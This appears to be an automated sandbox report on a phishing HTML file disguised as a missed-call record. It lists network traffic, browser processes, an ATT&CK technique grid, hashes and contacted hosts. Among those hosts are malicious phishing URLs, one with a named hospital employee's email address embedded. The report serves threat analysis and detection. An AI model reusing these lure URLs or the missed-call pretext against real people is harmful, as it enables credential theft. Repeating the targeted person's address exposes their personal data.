Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.17:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49796 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.17:49805 version: TLS 1.2
Source: classification engineClassification label: mal64.phis.evad.winHTML@19/6@42/321
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\MissedCall_Record_3295935663.html
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2020 --field-trial-handle=1984,i,11398822728638104287,1947308775252957004,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2020 --field-trial-handle=1984,i,11398822728638104287,1947308775252957004,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected

Data Obfuscation

barindex
Source: https://uxgj.lantecomin.ru/gkmjFbTi/#W#Bsara.fisher@overlakehospital.orgHTTP Parser: https://uxgj.lantecomin.ru/gkmjFbTi/#W#Bsara.fisher@overlakehospital.org
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Scripting
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
Registry Run Keys / Startup Folder
1
Extra Window Memory Injection
1
Deobfuscate/Decode Files or Information
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Extra Window Memory Injection
NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
file:///C:/Users/user/Desktop/MissedCall_Record_3295935663.html0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
resourcerepgroup.com
103.83.194.5
truetrue
    unknown
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      high
      2z8rb929h45s8kmdjiivosirpqipllvex8sgy1psdxeak2g6mrps1eus.deryposi.ru
      188.114.97.3
      truefalse
        unknown
        code.jquery.com
        151.101.130.137
        truefalse
          high
          cdnjs.cloudflare.com
          104.17.24.14
          truefalse
            high
            challenges.cloudflare.com
            104.18.95.41
            truefalse
              high
              uxgj.lantecomin.ru
              188.114.96.3
              truetrue
                unknown
                s-part-0017.t-0009.t-msedge.net
                13.107.246.45
                truefalse
                  high
                  sni1gl.wpc.omegacdn.net
                  152.199.21.175
                  truefalse
                    high
                    www.google.com
                    142.250.185.132
                    truefalse
                      high
                      www.office.com
                      unknown
                      unknownfalse
                        high
                        aadcdn.msftauth.net
                        unknown
                        unknownfalse
                          high
                          identity.nel.measure.office.net
                          unknown
                          unknownfalse
                            high
                            www.w3schools.com
                            unknown
                            unknownfalse
                              high
                              login.microsoftonline.com
                              unknown
                              unknownfalse
                                high
                                NameMaliciousAntivirus DetectionReputation
                                https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724712560964076.ZTUzMzIzZWYtOGJhNy00YzFlLTkyNTgtMTAxOGViNjRjM2IzMGQ5NWIwNGMtZTI3NC00ZWY3LTkwMzUtMWNiMTBjY2JhMTIx&ui_locales=en-US&mkt=en-US&client-request-id=9a583ca7-8344-4503-8721-796e492a66a8&state=ybnbi3iSEIZ6YwNi0-mI-zuXrQLOBwf0cgnttE_n53o53kblOCLTUGu9-eE2JRqkbj6qlAzUSebblgUXVzTKQpLaZpN-ll5LwFRLFZaZP_-kegrhmyhuvwrN59F9Seh9CpKfc5HAFOZpQJj-eCvL1r8JY2h8k69_KoQkeEqJxz0YWlVu1q-Nkr_3RlT0ylzYhdk2aVRmxg1q_TZa8SkrjM8nQ2zzpLMGjo3vDImny6XdkmrwBQcCbJB_0S9tNnceFzf6UcTT18p9BylbynCp4A&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=truefalse
                                  unknown
                                  file:///C:/Users/user/Desktop/MissedCall_Record_3295935663.htmltrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://uxgj.lantecomin.ru/gkmjFbTi/#W#Bsara.fisher@overlakehospital.orgtrue
                                    unknown
                                    https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724712560964076.ZTUzMzIzZWYtOGJhNy00YzFlLTkyNTgtMTAxOGViNjRjM2IzMGQ5NWIwNGMtZTI3NC00ZWY3LTkwMzUtMWNiMTBjY2JhMTIx&ui_locales=en-US&mkt=en-US&client-request-id=9a583ca7-8344-4503-8721-796e492a66a8&state=ybnbi3iSEIZ6YwNi0-mI-zuXrQLOBwf0cgnttE_n53o53kblOCLTUGu9-eE2JRqkbj6qlAzUSebblgUXVzTKQpLaZpN-ll5LwFRLFZaZP_-kegrhmyhuvwrN59F9Seh9CpKfc5HAFOZpQJj-eCvL1r8JY2h8k69_KoQkeEqJxz0YWlVu1q-Nkr_3RlT0ylzYhdk2aVRmxg1q_TZa8SkrjM8nQ2zzpLMGjo3vDImny6XdkmrwBQcCbJB_0S9tNnceFzf6UcTT18p9BylbynCp4A&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0false
                                      unknown
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      13.107.6.156
                                      unknownUnited States
                                      8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                      216.58.212.142
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      172.217.16.138
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      13.107.246.45
                                      s-part-0017.t-0009.t-msedge.netUnited States
                                      8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                      172.217.18.14
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      104.18.94.41
                                      unknownUnited States
                                      13335CLOUDFLARENETUSfalse
                                      2.19.126.85
                                      unknownEuropean Union
                                      16625AKAMAI-ASUSfalse
                                      151.101.130.137
                                      code.jquery.comUnited States
                                      54113FASTLYUSfalse
                                      40.126.32.76
                                      unknownUnited States
                                      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                      20.190.159.68
                                      unknownUnited States
                                      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                      40.126.31.67
                                      unknownUnited States
                                      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                      35.190.80.1
                                      a.nel.cloudflare.comUnited States
                                      15169GOOGLEUSfalse
                                      103.83.194.5
                                      resourcerepgroup.comUnited States
                                      132335NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdINtrue
                                      104.17.24.14
                                      cdnjs.cloudflare.comUnited States
                                      13335CLOUDFLARENETUSfalse
                                      1.1.1.1
                                      unknownAustralia
                                      13335CLOUDFLARENETUSfalse
                                      74.125.133.84
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      172.217.16.206
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      2.16.168.197
                                      unknownEuropean Union
                                      20940AKAMAI-ASN1EUfalse
                                      172.217.18.3
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      142.250.185.132
                                      www.google.comUnited States
                                      15169GOOGLEUSfalse
                                      104.18.95.41
                                      challenges.cloudflare.comUnited States
                                      13335CLOUDFLARENETUSfalse
                                      142.250.185.238
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      239.255.255.250
                                      unknownReserved
                                      unknownunknownfalse
                                      188.114.97.3
                                      2z8rb929h45s8kmdjiivosirpqipllvex8sgy1psdxeak2g6mrps1eus.deryposi.ruEuropean Union
                                      13335CLOUDFLARENETUSfalse
                                      142.250.185.131
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      188.114.96.3
                                      uxgj.lantecomin.ruEuropean Union
                                      13335CLOUDFLARENETUStrue
                                      52.138.229.66
                                      unknownUnited States
                                      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                      13.69.116.109
                                      unknownUnited States
                                      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                      104.17.25.14
                                      unknownUnited States
                                      13335CLOUDFLARENETUSfalse
                                      IP
                                      192.168.2.17
                                      192.168.2.18
                                      Joe Sandbox version:42.0.0 Malachite
                                      Analysis ID:1591142
                                      Start date and time:2025-01-14 18:06:42 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:20
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • EGA enabled
                                      Analysis Mode:stream
                                      Analysis stop reason:Timeout
                                      Sample name:MissedCall_Record_3295935663.html
                                      Detection:MAL
                                      Classification:mal64.phis.evad.winHTML@19/6@42/321
                                      Cookbook Comments:
                                      • Found application associated with file extension: .html
                                      • Exclude process from analysis (whitelisted): dllhost.exe
                                      • Excluded IPs from analysis (whitelisted): 172.217.18.3, 216.58.212.142, 74.125.133.84, 172.217.16.206, 2.19.126.85, 2.19.126.76, 172.217.18.14
                                      • Excluded domains from analysis (whitelisted): clients2.google.com, www.w3schools.com-v1.edgesuite.net, accounts.google.com, redirector.gvt1.com, encrypted-tbn0.gstatic.com, clientservices.googleapis.com, clients.l.google.com, a1400.dscb.akamai.net
                                      • Not all processes where analyzed, report is missing behavior information
                                      • VT rate limit hit for: file:///C:/Users/user/Desktop/MissedCall_Record_3295935663.html
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 14 16:07:15 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                      Category:dropped
                                      Size (bytes):2677
                                      Entropy (8bit):3.99715904184454
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:8C5C1F49BF2563D4374031EC3BFCD5CF
                                      SHA1:593F0124591B66E02EA54D3CFFFB53F12C1DB0BD
                                      SHA-256:F2904A8205AD84658B3181108AA372DF35E0471C71E13210F747F91365E304DF
                                      SHA-512:1B4D3405B588B6422C529707A0A475936FD18EED5B8C3304284AE4473D3DCAC9D54F447DC485C9FDAAD25C58555411E0E447BEE4B13CFFC8A3B9D175F8DD02DE
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:L..................F.@.. ...$+.,.......f......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Z.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Z.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Z............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Z............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............S......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 14 16:07:15 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                      Category:dropped
                                      Size (bytes):2679
                                      Entropy (8bit):4.012058445477866
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:DA9766C0B7A6A89E1077DB1C943047DD
                                      SHA1:0553E5079F3451109A048C2D775FF356954398CD
                                      SHA-256:5942DD6267C51538F2F3818D0FEEC3A8ED3724BE8D6B9A1D51C7B7170233F533
                                      SHA-512:25B5600D581C6E5B914E6D2263C2E2D97D1DC5E25227F9C65D1F4953F78D8223BB482E12F29BF419BA5F4D46B585F2B6EFBD52EEF8A9150C977B5B8495BB5B61
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:L..................F.@.. ...$+.,........f......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Z.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Z.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Z............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Z............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............S......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                      Category:dropped
                                      Size (bytes):2693
                                      Entropy (8bit):4.017895309750885
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:03A677C0444DCC373428696EBEBB0A96
                                      SHA1:8364778D72526EB88C6D7CCC1487F7E4FAEC2D67
                                      SHA-256:18E40CE8022C7E6E5EE3DDE5B9F985DA154056D273FE874717A5FCAB138B31B2
                                      SHA-512:D8BCF3EB6E9E3303FFFF42C5326006B6D9D1CE474647793C36D31B58241448C1095062BD24BD9CA4666886C7AD0512FD91BD0DA436D495ACD33666C40964311F
                                      Malicious:false
                                      Reputation:unknown
